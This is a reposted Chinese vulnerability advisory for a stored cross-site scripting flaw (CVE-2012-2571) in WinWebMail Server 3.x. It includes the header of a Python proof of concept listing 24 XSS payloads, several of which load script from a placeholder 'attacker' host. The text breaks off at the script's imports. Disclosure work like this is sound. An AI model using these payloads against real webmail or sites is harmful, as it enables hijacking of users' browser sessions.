首页 / 操作系统 / Linux / WinWebMail Server HTML Mail脚本插入漏洞
发布日期:2012-08-09 更新日期:2012-08-13受影响系统: WinWebMail Server WinWebMail Server 3.x 描述: -------------------------------------------------------------------------------- CVE ID: CVE-2012-2571WinWebMail Server是Windows平台上的多功能Web邮件服务器。WinWebMail Server 3.8.1.6及其他版本在实现上存在安全漏洞,HTML电子邮件中的输入没有正确过滤即被使用,可被利用插入任意HTML和脚本代码,在Web邮件接口中被打开后,可在受影响站点的用户浏览器会话中执行。<*来源:loneferret
链接:http://www.exploit-db.com/exploits/20366/ http://secunia.com/advisories/50213/ *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python"""Author: loneferret of Offensive Security Product: WinWebMail Server Version: 3.8.1.6 Vendor Site: http://www.winwebmail.net Software Download: http://www.winwebmail.net/email-server-download.htmlTimeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public DisclosureInstalled On: Windows Server 2003 SP2 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Internet Explorer 9Injection Point: Body Injection Payload(s): 1: ";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 2: <SCRIPT>alert("XSS")</SCRIPT> 3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5: <DIV STYLE="width: expression(alert("XSS"));"> 6: <IFRAME SRC="javascript:alert("XSS");"></IFRAME> 7: exp/*<XSS STYLE="noxss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))"> 8: <IMG STYLE="xss:expr/*XSS*/ession(alert("XSS"))"> 9: <XSS STYLE="xss:expression(alert("XSS"))"> 10: <!--[if gte IE 4]> <SCRIPT>alert("XSS");</SCRIPT> <![endif]-- 11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT> 12: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("XSS");+ADw-/SCRIPT+AD4- 13: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 14: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 15: <<SCRIPT>alert("XSS");//<</SCRIPT> 16: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 17: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> 18: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT> 19: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 20: <SCRIPT a="blah" "" SRC="http://attacker/xss.js"></SCRIPT> 21: <SCRIPT "a=">"" SRC="http://attacker/xss.js"></SCRIPT> 22: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT> 23: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 24: <SCRIPT a=">">" SRC="http://attacker/xss.js"></SCRIPT>"""import smtplib, urllib2